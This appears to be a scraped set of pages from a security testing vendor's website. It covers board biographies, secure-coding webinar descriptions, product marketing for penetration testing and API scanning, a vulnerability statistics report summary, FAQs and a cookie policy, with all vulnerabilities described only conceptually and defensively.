Security Verification Standard and the OWASP Cheatsheet Series. Never compromise threat protection. REQUEST DEMO PRODUCT VIDEO Board of Directors The best way to describe our board of directors is: Four People, One Vision. Each member of the board has proven to be as driven and dedicated to the success of Edgescan. They all share a combined passion for entrepreneurship and cyber security. This mutually shared goal has allowed them to lead our company to where it is now, while at the same time plotting a course for the future. Bernie Waldron Non-executive Chairman ABOUT BERNIE WALDRON Bernie is an international leader and experienced mentor with over 30 years of non-executive, executive and management experience, spanning Private Equity, Venture Capital, UK PLCs, and global blue-chip corporations. Bernie has personal responsibility for company or divisional revenues from $3bn per annum. Bernie adds value to any B2B organisation, particularly in Technology-Enabled, SaaS, IT Services or Business Services sectors, or where clarifying strategy, building sales capability, expanding internationally, or executing M&A is pivotal to growth. Eoin Keary CEO & Founder Linkedin Twitter ABOUT EOIN KEARY Eoin is a veteran of the cyber security industry with 20 years of software development and security experience. Eoin previously held the Global Vice Chair position at the OWASP foundation, and led development of the OWASP Testing and Code Review Guides. Eoin also led an EMEA penetration testing team, leading global enterprise cyber security engagements with a big 4 consultancy for 5 years prior to founding BCC Risk Advisory Ltd and Edgescan in 2011. Eoin was named OWASP Person of the year for 2015 and 2016 for contributions to the industry, and awarded the Tech Excellence Rising Star Award in 2015. Rahim Jina COO & Co-Founder Linkedin Twitter ABOUT RAHIM JINA Rahim has been involved in the cybersecurity industry in various guises. Prior to co-founding Edgescan, Rahim was enjoying the California sun as head of security for a cloud-based VOIP provider based in Los Angeles. Moving back to his native Dublin in 2013 was a difficult decision at the time, but full focus and energy was needed in building and growing Edgescan, which is well placed as part of the exciting tech and cyber scene in Ireland. With a B.Sc from Trinity College Dublin and an M.Sc from Dublin City University, Rahim is also a former Big 4 consultant, where he first met Eoin. Rahim regularly speaks (and is sometimes listened to) at conferences and has been involved with and contributed to organisations such as OWASP for too long. At Edgescan, Rahim is responsible for operational excellence across the entire organisation. Leo Casey Non-executive Chairman ABOUT LEO CASEY Leo leads BGF’s Dublin office, with responsibility for identifying, investing in, and supporting businesses throughout the Republic of Ireland with a requirement for longer-term and patient capital to support growth plans. Based in Dublin, Leo has more than 17 years of experience and knowledge of the Irish mid-market, helping Irish owner-managed and family businesses secure growth capital and unlock value. ### TRAINING COURSES: Master the Fundamentals of Secure Coding Free Training Courses Master the Fundamentals of Secure Coding with Jim Manico Watch for more Manicode training courses coming soon! Join Jim Manico, advisor to Edgescan and principal instructor at Manicode Security, for an essential webinar on Server-Side Request Forgery (SSRF), a critical vulnerability affecting modern web applications and APIs. Watch Now Ensure your code is secure from the top ten vulnerabilities discovered in the wild by Edgescan in 2023 1. SQL injection 2. File path traversal 3. Cross-site scripting (stored) 4. Malicious file upload 5. Brute forcing possible 6. PHP Unsupported version detection 7. Out-of-band resource load (HTTP) 8. Server-side template injection 9. Password submitted sing GET method 10. Sensitive file(s) disclosure AI-Powered Secure Coding: Harnessing AI for Better Software Development ON-DEMAND RECORDING watch now COURSE 8 DESCRIPTION Join Jim Manico, advisor to Edgescan and principal instructor at Manicode Security, for a cutting-edge webinar on leveraging artificial intelligence to generate more secure, efficient code. Introduction to Symmetric Cryptography ON-DEMAND RECORDING watch now COURSE 7 DESCRIPTION In this on-demand training session, dive into the world of symmetric cryptography and learn how to safeguard your sensitive information. Led by Jim Manico, a renowned cybersecurity expert and advisor at Edgescan, this comprehensive course will equip you with the knowledge and skills needed to master secure communication. Navigating the Web's Hazards: A Deep Dive into Out-of-Band Resource Load, Server-Side Template Injection, Unsafe Password Practices, and Sensitive File Disclosure ON-DEMAND RECORDING watch now COURSE 6 DESCRIPTION Join us for an training session where we unravel some of the web’s most overlooked yet critical security vulnerabilities. Our talk is crafted for developers, security professionals, and anyone keen on understanding and fortifying web security. This session is especially relevant for those involved in secure coding and application security. Crack the Code: Defending Against Brute Forcing ON-DEMAND RECORDING watch now COURSE 5 DESCRIPTION This training module is designed for developers to understand and counteract brute force attacks on web applications. Brute force attacks, where attackers methodically try numerous combinations to crack passwords, usernames, or other security credentials, pose a significant threat to web security. This module aims to equip developers with practical knowledge and tools to implement effective defenses against such attacks. File Upload Security ON-DEMAND RECORDING Watch now COURSE 4 DESCRIPTION Allowing users to upload files to your web or API application can be inherently risky. This module focuses on understanding the various attacks associated with file upload features and other file I/O-intensive functionalities. It’s crucial to recognize the potential threats and implement robust security measures to mitigate them. Stored but Not Secure: Defending Against Cross-site Scripting ON-DEMAND RECORDING Watch now COURSE 3 DESCRIPTION Cross-site Scripting (XSS) is a persistent peril that exposes web applications to script injection attacks. Our strategy to protect against this vulnerability should encompass rigorous output encoding, HTML sanitization and input filtering. Also, by adopting robust Content Security Policy (CSP) headers, diligent input validation, and embracing modern security-focused frameworks, we can fortify our applications against XSS, ensuring they remain both functional and resilient in the ever-evolving landscape of web security. Finding Your Way: Mitigating File Path Traversal Risk ON-DEMAND RECORDING Watch now COURSE 2 DESCRIPTION File path traversal, or directory traversal, is a treacherous adversary, capable of granting attackers unauthorized access to sensitive files. Our mission is to shield against this threat through stringent input validation and more, ensuring that user-provided file paths remain confined within their intended directory structures. Combining this with access control measures, such as ACLs and permissions, fortifies our defenses, guiding us safely through the complex terrain of file system security. The Snake in the Query: Preventing SQL Injection ON-DEMAND RECORDING Watch Now COURSE 1 DESCRIPTION SQL injection is a notorious vulnerability that we, as security practitioners and developers, must tackle head-on. It arises when attackers manipulate user inputs to execute malicious SQL queries, endangering our data integrity. To thwart these attacks, we must embrace prepared statements and parameterized queries, techniques that treat user inputs as data, not executable code, thus forming a robust defense against this venomous threat. Jim Manico Your instructor Jim Manico is the founder of Manicode Security, where he trains software developers on secure coding and security engineering. He is also an investor/advisor for 10Security, Aiya, MergeBase, Nucleus Security, KSOC, and Inspectiv.Jim is a frequent speaker on secure software practices, is a member of the Java Champion community, and is the author of “Iron-Clad Java: Building Secure Web Applications” from Oracle Press. Jim also volunteers for the OWASP foundation as the project lead for the OWASP Application Security Verification Standard and the OWASP Cheatsheet Series.Visit www.manicode.com to schedule an in-depth training course with Jim and crew. ### About Edgescan About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets for businesses large and small in a wide variety of industries across the globe.Founded in 2011 by Eoin Keary, Edgescan has offices in Dublin and New York City.We empower our clients to detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. Our OSCP- and CREST-certified experts validate every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives. EOIN KEARY | Founder, CEO What We Do Recently, I came across a “Cyber Defense” award that was offered in 195 different categories.It’s a stunning reminder of just how many different and diversified solutions there are available in our industry. Some are unproven, while others are effective when deployed properly. But with so many firms offering so many answers, it’s important to ask a more fundamental question:Why do we do what we do?Here’s why we developed Edgescan, and why we think it’s a decent solution for organizations of all types that want to strengthen their security posture... Scanning alone doesn’t work. Scanning software for security vulnerabilities makes sense, and it can be effective. But there’s risk on both sides: the scanner may miss threats because they’re lurking in unusual places, or hiding in plain sight with atypical characteristics. Or the tool might flag vulnerabilities that aren’t real—false positives.Edgescan is built to combine scanning’s breadth and range of coverage with a hybrid validation approach. All flagged vulnerabilities are automatically assessed against our proprietary data lake, which after 14 years of work on behalf of our clients is more like an ocean. Then there’s the human element: our team of expert penetration testers validate vulnerabilities to further ensure they are real threats to your systems. Risk-rated, noise suppressed. Our validation approach is like noise-suppression. Your list of vulnerabilities is free of false positives, meaning your security team will not waste time and money on phony threats and non-issues. This creates an efficiency that delivers real value to your organization, and it’s supercharged by another dimension of the Edgescan platform: risk-rating.“Which vulnerabilities should we fix today?” is the essential question for any security team, and even if they’re not wasting time on false positives, they may be wasting it on relatively minor issues while more dire threats go unaddressed. Luckily, your list of real vulnerabilities will also be risk-rated in the Edgescan dashboard, so your staff can attack the most serious threats first. Siloed vulnerability intelligence isn’t intelligent. Hackers do not care which layer of your stack they exploit, and a serious vulnerability—where bad actors can gain entry to your systems and escalate their privileges to cause wider havoc—might be lurking anywhere.For years, separate vulnerability-management tools that are specialized for different layers of the stack have been the standard, but getting these tools (and the staff who operate them) to collaborate effectively is costly, time-consuming, and may still leave gaps where you lack visibility.You need a comprehensive view across the full stack. The Edgescan platform combines network, host, and web-application vulnerability in a single dashboard, with validated and risk-rated results that in aggregate provide a single source of truth. Old-school penetration testing was clunky. In the traditional model, firms seek out qualified penetration testers, draw up contracts, bring them onboard their systems, and await results delivered in the form of a PDF. It’s slow, clunky, and expensive, and in many cases it does not capitalize on the client’s existing knowledge of their attack surface and the threat matrix. Why not integrate your pen testing with your vulnerability management? A detailed map of your attack surface and diagnostics on already known threats will allow testers to go deeper and focus their time and attention on the most complex issues that require a human touch. With the Edgescan platform, you can test and retest vulnerabilities on-demand instead of waiting on a contractor, and when you contact our support team, you can speak with an OSCP- or CREST-certified penetration tester at any time. Scanning alone doesn’t work. Scanning software for security vulnerabilities makes sense, and it can be effective. But there’s risk on both sides: the scanner may miss threats because they’re lurking in unusual places, or hiding in plain sight with atypical characteristics. Or the tool might flag vulnerabilities that aren’t real—false positives.Edgescan is built to combine scanning’s breadth and range of coverage with a hybrid validation approach. All flagged vulnerabilities are automatically assessed against our proprietary data lake, which after 14 years of work on behalf of our clients is more like an ocean. Then there’s the human element: our team of expert penetration testers validate vulnerabilities to further ensure they are real threats to your systems. Risk-rated, noise suppressed. Our validation approach is like noise-suppression. Your list of vulnerabilities is free of false positives, meaning your security team will not waste time and money on phony threats and non-issues. This creates an efficiency that delivers real value to your organization, and it’s supercharged by another dimension of the Edgescan platform: risk-rating.“Which vulnerabilities should we fix today?” is the essential question for any security team, and even if they’re not wasting time on false positives, they may be wasting it on relatively minor issues while more dire threats go unaddressed. Luckily, your list of real vulnerabilities will also be risk-rated in the Edgescan dashboard, so your staff can attack the most serious threats first. Siloed vulnerability intelligence isn’t intelligent. Hackers do not care which layer of your stack they exploit, and a serious vulnerability—where bad actors can gain entry to your systems and escalate their privileges to cause wider havoc—might be lurking anywhere.For years, separate vulnerability-management tools that are specialized for different layers of the stack have been the standard, but getting these tools (and the staff who operate them) to collaborate effectively is costly, time-consuming, and may still leave gaps where you lack visibility.You need a comprehensive view across the full stack. The Edgescan platform combines network, host, and web-application vulnerability in a single dashboard, with validated and risk-rated results that in aggregate provide a single source of truth. Old-school penetration testing was clunky. In the traditional model, firms seek out qualified penetration testers, draw up contracts, bring them onboard their systems, and await results delivered in the form of a PDF. It’s slow, clunky, and expensive, and in many cases it does not capitalize on the client’s existing knowledge of their attack surface and the threat matrix.Why not integrate your pentesting with your vulnerability management? A detailed map of your attack surface and diagnostics on already known threats will allow testers to go deeper and focus their time and attention on the most complex issues that require a human touch. With the Edgescan platform, you can test and retest vulnerabilities on-demand instead of waiting on a contractor, and when you contact our support team, you can speak with an OSCP- or CREST-certified penetration tester at any time. 95% Customer Retention CUSTOMER RETENTION 95% Edgescan drives significant improvement to global organizations continuous exposure management and security testing programs. We cut through the noise to deliver validated risk and proven exploits to our returning happy clients. See for yourself... RECOMMENDED BY REVIEWERS 98% 98% of Gartner Peer Insight reviewers would recommend Edgescan. ### Edgescan War Room - Videos providing expert advice on managing security programs, covering DevSecOps, DevOps, Development Edgescan War Room Conversation. Vision. Strategy. Tactics. Welcome to the Edgescan War Room Edgescan War Room is a series of informal conversations between Eoin Keary, CEO and Founder of Edgescan and Jim Manico, Edgescan Strategic Technical Advisor and Founder of Manicode.Here, is a collection of videos bring together innovative approaches and best practices to secure your internet-facing assets, covering DevSecOps, DevOps, Security Operations, Secure Development, and more. Our goal is to provide expert advice on managing robust security programs, incorporating services like penetration testing,  external attacks surface management, and risk-based vulnerability management.Watch a video and see how we address the challenges of building and maintain a robust security program in a fun and light-hearted manner. Join us on this proactive journey to safeguard your online presence and stay ahead of evolving security risks. Watch Now NEW!  Episode 6Artificial Intelligence in Security and the Importance of Training Watch Now Episode 52024 Vulnerability Statistics Preview and How to Think About Prioritizing Them Watch Now Episode 4Cyber Acronyms 101 Watch Now Episode 3Scaling with PTaaS, ASM and Risk-based VM Solutions and Thoughts on What Happens WHEN You Get Breached Watch Now Episode 2Pragmatic Observations on EASM, Data Quality, and the Future AI Watch Now Episode 1Can ChatGPT, AI and Machine Learning Improve Cybersecurity Performance? ### API Security Testing API Security Testing Rapid analysis. Immediate risk triage. Data Shows that API Risk is Increasing… Not Going Away Actual deployment data from Edgescan customers reveals a 320% rise in API vulnerability in 2022 – that is a shocking number. And to top it off, Gartner research indicates that API abuse will become the most frequent attack vector. Don’t let your company make a news headline. Time to get your security under control. Know Your APIs. Scan Your APIs. Don’t confuse API security configuration assessment with traditional vulnerability scanning – it is different. Using multi-layer probing technology the Edgescan API discovery engine utilizes asynchronous port scanning to identify and then monitor network changes. It automatically discovers active API endpoints across your entire attack surface and profiles from given endpoints. API Data Sheet Learn How it Works In-depth Approach to Securing APIs Download API Discovery Journey Complete cloud coverage Discover hidden and rogue APIs across your cloud providers including AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI. Our multi-layered approach to discovering APIs results in a confidence interval describing if an API is actually present. API discovery works by applying specialised probing traffic across each endpoint and evaluating the results. This multi-layered approach results in detection of APIs based on responses to the probes sent. Securing APIs is as easy as one, two, three. 1. API Discovery Identify known and rogue APIs on each host across your IP/CIDR ranges using patented, multi-layer, production safe API probing technology. 2. API Vulnerability Scanning Detects security vulnerabilities with accuracy to keep pace with your ever-changing IT landscape. 3. API Penetration Testing A manual penetration test is conducted on every business critical APIs. Key Benefits of API Security Testing API discovery across your global ecosystem Identify known and rogue APIs on each host across your IP/CIDR ranges using patented, multi-layer, production safe API probing technology. Accurately monitor & track changes Map out entire APIs to ensure a rigorous assessment and detect changes by consuming OpenAPI/Swagger/ GraphQL files. Proactive & continuous API protection Establish unfettered monitoring and defense against botnets, advanced threats, and DDoS with on demand and real time alerts. Complete cloud coverage Discover hidden and rogue APIs across your cloud providers including AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI. High Risk API Vulnerabilities Discovered by Edgescan Broken Object-Level Authorization APIs often expose endpoints handling object identifiers. Any function that accepts users input and uses it to access a data source can create a Level Access Control issue, widening the attack surface. Object-level authorization checks should be carried out on all such functions. Broken User Authentication Attackers often take advantage of incorrectly applied authentication mechanisms. They may compromise an authentication token or exploit flaws in implementation to pose as another user, either on a one-time basis or permanently. If the system’s ability to identify the client/user is compromised, so is the overall API’s security. Excessive Data Exposure Developers often rely on the client side to filter the data before displaying it to the user. This can create serious security issues—data must always be filtered at the server side, and only the relevant information should be delivered to the client side. Lack of Resources and Rate Limiting APIs often don’t restrict the number or size of resources that the client/user can request. This can impact the performance of the API server, resulting in Denial of Service (DoS), and exposing authentication vulnerabilities, enabling brute force attack. Broken Function-Level Authorization Authorization flaws often result from overly complex access control policies, or if there is no clear separation between regular and administrative functions. Attackers can exploit these vulnerabilities to gain access to a user’s resources or perform administrative functions. Mass Assignment: Mass assignment typically results from the binding of client-provided data (i.e. JSON) to a data model based on an allowlist, without proper filtering of properties. Attackers can modify object properties in a number of ways—they can explore API endpoints, read the documentation, guess object properties, or provide additional properties through request payloads. Security Misconfiguration Security misconfiguration often results from inadequate default configurations, ad-hoc or incomplete configurations, misconfigured HTTP headers or inappropriate HTTP methods, insufficiently restrictive Cross-Origin Resource Sharing (CORS), open cloud storage, or error messages that contain sensitive information. Injection Injection flaws (including SQL injection, NoSQL injection, and command injection) involve data that is sent to an interpreter from an untrusted source via a command or query. Attackers can send malicious data to trick the interpreter into executing dangerous commands, or allow the attacker to access data without the necessary authorization. Latest Blog Posts ### Application Security Testing (AST) Application Security Testing Industrial-scale coverage. Eliminate false positives. Visibility is Key Today’s enterprises deploy a wide range of systems, servers, cloud and web applications, accessible from any location. Visibility of such systems in terms of security posture is of vital importance. The lack of management and not understanding what to manage (no visibility) results in assets which are an easy target for hackers and may result in a data breach. Visibility is key to maintaining a secure posture. The Edgescan Attack Surface Management solution provides that visibility in many ways from metrics, asset profiling and continuous vulnerability detection to verified vulnerability intelligence and risk-based results. Industrial-scale Coverage Every web application assessed gets the “full stack” treatment, meaning the application undergoes penetration testing and automated vulnerability assessment. Each and every exposure that is discovered assessed for severity and whether it is listed as a vulnerability currently being exploited on the public Internet and is validated to determine if it is exploitable and a real risk. This makes prioritization much easier.Each vulnerability is verified by our team of certified experts to ensure that only REAL threats are escalated. Edgescan customers never experience false positives or false alarms. Vulnerability scanning on-demand when you want it, and scheduled as often as you need Use the vulnerability scanning and validation service as much as you like – Unlimited testing and retesting of discovered issues and retest as often as needed to verify mitigation at no additional cost – providing peace of mind.Edgescan can also alert you if a new vulnerability is discovered via SMS, email, Slack or Webhook. Complete visibility to expose weaknesses and risk across your deployed applications and web services. Edgescan provides verified vulnerability data into the existing CI/CD toolset, so DevOps teams have the critical data they need earlier in the software development lifecycle.      Key Benefits of Application Security Testing Hybrid approach to assessments  Applications are assessed using the platform’s automated tools combined with human expertise and cyber analytics resulting in high accuracy and industrial-scale coverage, eliminating false positives. Integrates with existing tools Edgescan provides verified vulnerability data into your existing CI/CD tool stack to so developers and operations teams have the critical data they need earlier in the software development lifecycle.Seamlessly integrates alerts and notifications with your installed third-party systems for complete visibility across your tool stack. Customizable reporting Enables auditing and trend analysis by tracking closed vulnerabilities, vulnerability age, posture status, and many other security metrics. Also create API-based reporting for GRC integrations per asset. No more sifting through pages of data and clunky PDFs. Unlimited and on demand vulnerability assessments & retesting  Unlimited testing and retesting of discovered issues and retest as often as needed to verify mitigation at no additional cost – providing peace of mind. Latest Blog Posts ### Vulnerability Statistics Report 2025 Vulnerability Statistics Report Celebrating a Decade of Security Insights​ Welcome to the 10th anniversary edition of the Edgescan Vulnerability Statistics Report! Drawing from our analysis of thousands of security assessments and penetration tests conducted globally throughout 2024, this landmark report delivers authoritative insights into the cybersecurity landscape across hundreds of organizations and industries worldwide. Don't miss the latest data in the 2025 Mid-Year Snapshot! Get Update Our 2025 report delves deeper than ever before into critical metrics that matter to security professionals. We explore Risk Density patterns across network/device and application layers, uncover complex vulnerabilities that automated tools consistently miss, and evaluate the real-world effectiveness of today's leading vulnerability scoring methodologies including EPSS, CISA KEV, CVSS, and our proprietary EVSS system.This year's findings reveal significant industry variances in vulnerability remediation efficiency, with software companies achieving the fastest mean time to remediate (63 days) while construction sector organizations lag considerably (104 days). We've also identified concerning patterns in vulnerability management, with larger enterprises leaving 45.4% of discovered vulnerabilities unresolved within a 12-month period—predominantly within the network/device layer. Key findings from the 2025 report include: Across the full stack, more than 33% of discovered vulnerabilities were of critical or high severity SQL Injection (CWE-89) remains the most common critical web application vulnerability, continuing a trend since 2022 Application / API: high/critical severity: average MTTR 74.3 days device/network vulnerabilities: high/critical severity: average MTTR 54.8 days In 2024, a record-breaking 40,009 Common Vulnerabilities and Exposures (CVEs) were published The CISA Known Exploited Vulnerabilities (KEV) catalog contained 1,238 vulnerabilities by the end of 2024, with 185 added during the year 768 CVEs were publicly reported as exploited for the first time in the wild in 2024, representing 2% of all discovered vulnerabilities and a 20% increase from 2023 For a decade, our Vulnerability Statistics Report has served as the definitive resource for security professionals seeking to understand emerging threats and optimize their defensive strategies. Download the complete 2025 report today and gain the actionable intelligence you need to strengthen your organization's security posture. Some rare vulnerabilities cause outsized damage when exploited—"intensive rather than extensive risk." No single risk scoring system is sufficient. EPSS, CISA KEV, CVSS, and SSVC offer valuable but sometimes contradictory guidance.Production patching remains difficult, reflected in our MTTR statistics. Continuous assessment visibility is essential. Internal networks show alarming security gaps, with vulnerabilities compounding across the technology stack.CVEs from 2015 are still being discovered and exploited by modern malware. Attack Surface Management is critical—too many sensitive systems remain exposed due to poor visibility.This report helps prioritize what matters across industries, because not all vulnerabilities are equal threats.— Eoin Keary, CEO & Founder Previous Editions of the Report Overview of the Edgescan Vulnerability Stats Report Since 2015 Edgescan has annually produced the Vulnerability Statistics Report to provide a global snapshot of the overall state of cybersecurity. The report presents a by-the-numbers insight into trends and statistics looking back across a 12-month data set from the previous year, including cyber threats, data breaches, and cyber attacks. Every year the report provides a statistical model, that is presented using infographics and charts, of the most common weaknesses faced by enterprises to enable data-driven decisions for managing risks and exposures more effectively.This yearly report has become a reliable source for approximating the global state of vulnerability management. This is exemplified by our unique dataset being part of the Verizon Data Breach Report (DBIR), which is the de facto standard for insights into the common drivers for incidents and breaches today. Methodology of Data Collection The vulnerability data analyzed for the Edgescan Vulnerability Statistics Report was collected from thousands of security assessments and penetration tests performed on millions of assets; this growing collection of intelligence is stored in our data lake and shared amongst the solutions that comprise the Edgescan Platform.Vulnerability data was sourced from over 250 companies of various sizes, Fortune 500 to medium and small businesses, across 30 industry verticals. ### Product Documents and Data Sheets Datasheets and Technical Documents Platform Overview Download Penetration Testing as a Service Download Dynamic Application Security Testing Download Network Vulnerability Managment Download API Security Testing Download Mobile Application Security Testing Download Attack Surface Management Download AI Insights Download Cloudhook Download Full Stack Download Seamless Integrations Download PCI Approved Download Risk-Rated Download End-to-End Support Download ### The Platform The Edgescan Platform One platform for continuous testing and exposure management The Platform that gives you continuous security testing, validated risk and proven exploits that will 100% improve your exposure management program. PTaaS DAST NVM API MAST ASM PTaaS DAST NVM API MAST ASM Unified. Continuous. Accurate. Welcome to Edgescan, the leading platform for continuous security testing, exposure management, and Penetration Testing as a Service (PTaaS). Gain comprehensive visibility into your cyber footprint with our advanced solutions, designed to provide Continuous Threat and Exposure Management (CTEM). From initial discovery to prioritization and remediation, Edgescan ensures your organization's security is robust and proactive. Download the Edgescan Overview datasheet Datasheet Exposure management Edgescan’s exposure management solution enhances traditional vulnerability management by prioritizing remediation based on real risk levels. This approach ensures security teams focus on the most critical threats first, reducing overall exposure and improving response times. Risk Prioritization Utilize systems like EPSS, CISA KEV, and CVSS, alongside Edgescan’s proprietary EVSS, to prioritize vulnerabilities.​ Verified Vulnerabilities Only real and actionable results are delivered, eliminating false positives. Unlimited Assessements and Retests Schedule assessments anytime and retest on demand, ensuring ongoing accuracy. Key features Comprehensive asset discovery and assessment Utilize Attack Surface Management (ASM) to identify assets requiring protection.Perform vulnerability assessments with a blend of automated scanning and human expertise, ensuring 100% validated results.Prioritize and remediate vulnerabilities quickly with actionable intelligence.​ Best-in-class testing across all platforms Conduct thorough testing across networks, APIs, web applications, and mobile applications.Use validated vulnerability intelligence and traditional scoring systems for compliance.Leverage proprietary risk and breach rating systems to focus on the most critical vulnerabilities. Hybrid Approach and continuous testing Combine automated continuous testing with expert validation for near 100% accuracy.Access consultancy-grade penetration testing delivered by certified security experts (CREST, OSCP).Enjoy unlimited retesting and exposure management across all infrastructure.​ Advanced AI experts Utilize Edgescan AI Insights to analyze vulnerability data in real-time.Benefit from strategic activities related to ransomware prevention, compliance, training, and anomaly detection.​ Proprietary data lake for vulnerability intelligence Store all vulnerability data in our growing proprietary data lake, shared across solutions.Our proprietary data lake is used to preserve accuracy using intelligent data science and analytics. Comprehensive asset discovery and assessment Utilize Attack Surface Management (ASM) to identify assets requiring protection.Perform vulnerability assessments with a blend of automated scanning and human expertise, ensuring 100% validated results.Prioritize and remediate vulnerabilities quickly with actionable intelligence.​ Best-in-class testing across all platforms Conduct thorough testing across networks, APIs, web applications, and mobile applications.Use validated vulnerability intelligence and traditional scoring systems for compliance.Leverage proprietary risk and breach rating systems to focus on the most critical vulnerabilities. Advanced AI experts Utilize Edgescan AI Insights to analyze vulnerability data in real-time.Benefit from strategic activities related to ransomware prevention, compliance, training, and anomaly detection.​ Hybrid Approach and continuous testing Combine automated continuous testing with expert validation for near 100% accuracy.Access consultancy-grade penetration testing delivered by certified security experts (CREST, OSCP).Enjoy unlimited retesting and exposure management across all infrastructure.​ Proprietary data lake for vulnerability intelligence Store all vulnerability data in our growing proprietary data lake, shared across solutions.Our proprietary data lake is used to preserve accuracy using intelligent data science and analytics. Full stack coverage: web applications, network layer (host/server) and APIs Application Web applications (authenticated and unauthenticated), API’s (JSON, XML, WSDL, YAML and Graph), microservice architecture, single page applications, mobile applications. Network Covering cloud endpoints, public and non public systems, Edgescan delivers continuous vulnerability detection and exposure management. Why choose Edgescan? Edgescan’s exposure management solution enhances traditional vulnerability management by prioritizing remediation based on real risk levels. This approach ensures security teams focus on the most critical threats first, reducing overall exposure and improving response times. Accuracy and depth Continuous security testing with unmatched depth and precision. Human expertise Expert validation ensures actionable, false positive-free results. Scalability From small businesses to global enterprises, Edgescan scales to meet your needs. Proven exploits Focus only on what is proven to be an active threat and proven to be real. Proactive security Stay ahead of threats with continuous monitoring and rapid remediation. Accuracy and depth Continuous security testing with unmatched depth and precision. Human expertise Expert validation ensures actionable, false positive-free results. Scalability From small businesses to global enterprises, Edgescan scales to meet your needs. Proven exploits Focus only on what is proven to be an active threat and proven to be real. Proactive security Stay ahead of threats with continuous monitoring and rapid remediation. Never compromise threat protection. Request a Demo Edgescan Platform FAQs What is software vulnerability software? Software vulnerability management refers to the process of identifying, assessing, prioritizing, and mitigating security vulnerabilities in software applications and systems. It aims to proactively detect weaknesses that attackers could exploit, leading to potential security breaches. By regularly patching, updating, and implementing security measures, organizations can reduce the risk of cyberattacks and enhance their overall cybersecurity posture. What is a vulnerability assessment solution? A vulnerability assessment solution is a software tool or service that scans and evaluates computer systems, networks, or applications to identify potential security weaknesses and critical vulnerabilities. It helps organizations detect and prioritize risks, allowing them to take proactive measures to strengthen their defenses and protect against cyber threats. What is a vulnerability scanner? A vulnerability scanner is a software tool that scans computer systems, networks, or applications to identify security weaknesses and vulnerabilities. It automatically searches for potential entry points for cyberattacks, helping organizations assess their risk levels and take proactive measures to strengthen their defenses and protect against potential cyber threats. What is a vulnerability management program? Vulnerability management programs have a systematic approach to identify, evaluate, and address security vulnerabilities in an organization’s software, systems, and networks. It involves regular assessments, prioritizing risks, and implementing measures to mitigate threats, ensuring ongoing protection against cyberattacks and maintaining a robust cybersecurity posture. Risk-based vulnerability management: What is it? RBVM is the process of prioritizing and remediating vulnerabilities by the risk level that they pose to the organization. Managing a cybersecurity risk assessment, how can organizations ensure proactive threat identification and mitigation? To proactively identify and mitigate cybersecurity risks, organizations should conduct regular risk assessments, leverage threat intelligence, stay informed about emerging threats, and implement robust security controls. Continuous vigilance is critical. Risk based vulnerability management vs traditional vulnerability management: Which one is better for managing vulnerabilities? RBVM (Risk-Based Vulnerability Management) outshines traditional methods by prioritizing vulnerabilities based on risk impact. It’s a smarter, more effective approach for robust cybersecurity. Vulnerability risk management tools: What do you need to look out for? First, there are quite a few vulnerability management (VM) tools out there that cannot accomplish what they claim they are capable of, so thorough due process when selecting a VM tool is always recommended. Beyond VM tool capability, there are often resource constraints within the organization, and in most cases, expertise and experience around managing, configuring, and deploying VM tools. Last, even when all of this is accounted for and done properly, there are additional cycles required by an organization to ensure that the outputs of these tools are actionable (i.e., no wasting development cycles on false positives, having enough context and guidance around the remediation, support, etc.). RBVM Solution: How can cyber security teams leverage it? Edgescan RBVM is designed to augment an organization’s security team by eliminating the need to own, manage, and configure multiple tools such as network vulnerability scanners and DAST tools. Further, Edgescan RBVM presents only validated vulnerabilities to the platform so teams do not waste cycles on false positives. Vulnerabilities in cybersecurity can pose significant risks. How can organizations systematically assess, prioritize, and mitigate these vulnerabilities to bolster their digital defenses? Edgescan RBVM incorporates industry standard risk rating systems like NIST CVSS, along with third-party threat feeds like the CISA Known Exploited Vulnerabilities (KEV) Catalog, FIRST.org Exploit Prediction Scoring System (EPSS), along with propriety risk rating systems (i.e. Edgescan Validated Security Score (EVSS) and Edgescan Exposure Factor (EXF)), so organizations have the visibility and flexibility to determine the approach that is right for them. How do you prioritize critical vulnerabilities based on risk and impact? There are many different approaches to risk-based prioritization of vulnerabilities. Still, in general, the risk is determined by many factors, including but not limited to the sensitivity of the data that is potentially assessable if a breach were to occur, how likely a vulnerability is to be exploited, and whether the vulnerability is known to have been exploited. How can risk-based management strategies help organizations identify and mitigate security risk vulnerabilities effectively? RBVM (Risk-Based Vulnerability Management) empowers organizations to strategically prioritize and address cybersecurity risks. It’s about smartly managing vulnerabilities to enhance overall security resilience. ### Cookie Policy Cookie Policy At Edgescan we believe that privacy is important. The following information explains the information we collect from website users and how we use it. The following policy specifies what cookies are, how and which ones Edgescan uses. 1. What are Cookies? Cookies are small pieces of text used by our website to make your experience more efficient and enjoyable, such as remembering your browsing habits, preferences, login information, and more. The information collected is only related to your browsing, and does not include sensitive information such as banking data. 2. Why do we use Cookies? Edgescan uses cookies to provide a better browsing experience on our website, remembering your preferences and personalizing relevant content based on your choices and browsing behavior. With this, we seek to adjust the content of our site to make it more relevant to you, facilitating your navigation while assisting in our promotional and marketing efforts. 3. Which Cookies do we use? The cookies we use are listed below: 3.1. Functionality Cookies Cookies that allow our website to remember your choices, such as website language, content presentation, login information, among others. They are: Cookie name Provider Expiration _icl_current_language edgescan.com 1 day _icl_visitor_lang_js edgescan.com 1 day wpml_browser_redirect_test edgescan.com Session 3.2. Performance Cookies Cookies that allow us to understand how our customers interact with our website, evaluating the most and least accessed pages and other statistical information. These cookies only collect anonymized data for statistics, and no personal data is collected. They are: Cookie Name Provider Expiration _ga edgescan.com 2 years _gat edgescan.com 1 day _gid edgescan.com 1 day _hjAbsoluteSessionInProgress edgescan.com 1 day _hjFirstSeen edgescan.com 1 day _hjid edgescan.com 1 year _hjid edgescan.com Persistent _hjIncludedInPageviewSample edgescan.com 1 day collect google-analytics.com Session 3.3. Publicity Cookies Cookies used to understand the profile of each user in order to direct personalized and relevant advertisements and publicity. Cookie Domain Description Duration Type _ga .edgescan.com The _ga cookie, installed by Google Analytics, calculates visitor, session and campaign data and also keeps track of site usage for the site's analytics report. The cookie stores information anonymously and assigns a randomly generated number to recognize unique visitors. 1 year 1 month 4 days Analytics _gid .edgescan.com Installed by Google Analytics, _gid cookie stores information on how visitors use a website, while also creating an analytics report of the 